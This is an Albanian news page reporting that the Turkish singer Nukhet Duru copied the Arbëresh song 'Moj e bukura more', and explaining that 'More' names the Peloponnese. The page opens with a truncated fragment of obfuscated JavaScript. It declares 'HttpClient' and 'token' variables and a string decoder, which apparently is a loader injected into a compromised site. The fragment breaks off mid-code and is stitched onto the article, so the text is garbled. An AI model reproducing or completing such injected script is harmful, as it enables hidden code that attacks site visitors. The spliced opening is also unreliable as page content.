;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këngëtarja turke kopjon këngën arbëreshe “Moj e bukura more” (VIDEO)

By

Këngëtarja e famshme turke, Nukhet Duru, ka kopjuar muzikën e këngës së famshme arbëreshe, “Moj e bukura more”, duke e përshtatur në baladën e saj, ‘Kapildin Gitti’.

Kënga “Moj e bukura more” cilësohet si një himn i emigrimeve, i dhimbjes dhe i mallit të të larguarve nga vendi dhe është ndër këngët arbëreshe të interpretuara më shpesh.

More! Është një pasthirrmë?!… një vajzë e bukur?! Jo!

More është Peloponezi i sotëm i Greqisë. Sipas një studimi të botuar në Itali në vitin 1886, nga filologu arbëresh Dhimitër Kamarda, More është një trevë e madhe, së cilës grekët i kanë ndryshuar emrin dhe e kanë kthyer në Peloponezi.

Kënga “O e bukura More” memorizon kujtesën e madhe të një atdheu të humbur. Sipas filologut arbëresh, Dhimitër Kamarda,  është një toponim i këtij vendi nga ku u larguan shumica e arbëreshëve të sotëm të Italisë.

Artikuj të ngjashëm